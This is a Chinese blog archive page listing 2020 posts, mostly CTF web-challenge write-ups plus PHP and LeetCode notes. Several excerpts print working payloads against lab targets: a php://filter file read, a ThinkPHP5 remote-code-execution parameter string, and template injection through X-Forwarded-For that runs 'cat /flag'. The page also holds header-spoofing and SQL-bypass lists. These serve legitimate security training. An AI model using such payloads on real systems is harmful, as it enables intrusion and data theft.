年份:2020年

41 篇文章

[NCTF2019]Fake XML cookbook
从XML相关一步一步到XXE漏洞 查看题目源码,并且题目提示了XML,源码也给出了 function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || password == ""){ a…
serialize和unserialize函数
一、serialize序列化函数 序列化是将变量转换为可保存或传输的字符串的过程 <?php $a = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut'); //序列化数组 $s = serialize($a); echo $s; //输出结果:a:3:{s:1…
[BSidesCF 2020]Had a bad day
随便点一下 猜测sql注入,报错显示include(),是文件包含 http://d5fd4aa8-7ea1-4fc3-ae53-d3f1ea84d5d0.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/resource=index 读取index …
[BJDCTF 2nd]old-hack
构造参数报错http://79389e31-5ac2-43b0-a1ee-6a54ec8390a2.node3.buuoj.cn/?s=1 可以看到THINKPHP5的版本 直接百度构造参数_method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_…
[BJDCTF 2nd]假猪套天下第一
打开是个登录界面除了admin,所有东西都能登录 尝试抓包,可以看到一个302的包,下面有个注释,尝试访问 进行访问,提示99年后开放 发现cookie上有个time,时间戳,把时间改成99年之后,提示用本机访问 构造请求头访问,提示需要来自gem-love.com 增加Referer:gem-love.com,提示必须在Commodo 64浏览器…
[BJDCTF2020]ZJCTF,不过如此
源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><…
[BJDCTF2020]The mystery of ip
提示IP 猜测用XFF,伪造XFF头看看情况 用X-Forwarded-For: {{7*7}}有回显 构造payload: X-Forwarded-For: {{system("ls")}} X-Forwarded-For: {{system("cat /flag")}}
Web
常见的几个HTTP IP头 x-forwarded-for x-remote-IP x-originating-IP x-remote-ip x-remote-addr x-client-ip x-client-IP Client-ip X-Real-ip SQL Injection SQL绕过 空格被过滤 %20 %09 %0a %0b %0c …
有多少小于当前数字的数字
题目 给你一个数组 nums,对于其中每个元素 nums[i],请你统计数组中比它小的所有数字的数目。 换而言之,对于每个 nums[i] 你必须计算出有效的 j 的数量,其中 j 满足 j != i 且 nums[j] < nums[i] 。 以数组形式返回答案。 示例 输入:nums = [8,1,2,2,3] 输出:[4,0,1,1,3…
接雨水
题目 给定 n 个非负整数表示每个宽度为 1 的柱子的高度图,计算按此排列的柱子,下雨之后能接多少雨水。 思考 建立一个栈,栈为空时,如果数大于0就push,并且保存第一个数,遍历,如果小于第一个数的就push,大于的话就开始pop,循环完成后可能会遇到栈底的数最大,栈不为空,就还需要进行一个循环,反过来计算直到栈为空 代码 import java…